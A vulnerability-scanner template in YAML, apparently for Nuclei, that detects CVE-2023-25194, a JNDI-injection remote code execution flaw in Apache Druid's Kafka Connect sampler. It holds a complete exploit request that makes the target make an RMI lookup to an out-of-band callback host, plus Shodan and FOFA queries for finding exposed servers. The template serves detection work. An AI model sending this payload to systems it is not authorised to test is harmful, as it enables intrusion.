102 lines
3.7 KiB
YAML
102 lines
3.7 KiB
YAML
id: CVE-2023-25194
|
|
|
|
info:
|
|
name: Apache Druid Kafka Connect - Remote Code Execution
|
|
author: j4vaovo
|
|
severity: high
|
|
description: |
|
|
The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API
|
|
reference:
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-25194
|
|
- https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce
|
|
- http://packetstormsecurity.com/files/173151/Apache-Druid-JNDI-Injection-Remote-Code-Execution.html
|
|
- https://kafka.apache.org/cve-list
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.8
|
|
cve-id: CVE-2023-25194
|
|
cwe-id: CWE-502
|
|
epss-score: 0.96717
|
|
epss-percentile: 0.99653
|
|
cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: apache
|
|
product: kafka_connect
|
|
shodan-query:
|
|
- html:"Apache Druid"
|
|
- http.html:"apache druid"
|
|
fofa-query: body="apache druid"
|
|
tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
|
|
{
|
|
"type":"kafka",
|
|
"spec":{
|
|
"type":"kafka",
|
|
"ioConfig":{
|
|
"type":"kafka",
|
|
"consumerProperties":{
|
|
"bootstrap.servers":"127.0.0.1:6666",
|
|
"sasl.mechanism":"SCRAM-SHA-256",
|
|
"security.protocol":"SASL_SSL",
|
|
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
|
|
},
|
|
"topic":"test",
|
|
"useEarliestOffset":true,
|
|
"inputFormat":{
|
|
"type":"regex",
|
|
"pattern":"([\\s\\S]*)",
|
|
"listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
|
|
"columns":[
|
|
"raw"
|
|
]
|
|
}
|
|
},
|
|
"dataSchema":{
|
|
"dataSource":"sample",
|
|
"timestampSpec":{
|
|
"column":"!!!_no_such_column_!!!",
|
|
"missingValue":"1970-01-01T00:00:00Z"
|
|
},
|
|
"dimensionsSpec":{
|
|
|
|
},
|
|
"granularitySpec":{
|
|
"rollup":false
|
|
}
|
|
},
|
|
"tuningConfig":{
|
|
"type":"kafka"
|
|
}
|
|
},
|
|
"samplerConfig":{
|
|
"numRows":500,
|
|
"timeoutMs":15000
|
|
}
|
|
}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "dns"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'RecordSupplier'
|
|
|
|
- type: status
|
|
status:
|
|
- 400
|
|
# digest: 490a00463044022040f38271d9eeed074bae69e573d343878cb2471b0becb2a8ec869d630b119ba502200daf17c6f547a912abddcda4a7bf5ad2c352605043e19ce00a29179038bc3555:922c64590222798bb761d5b6d8e72950 |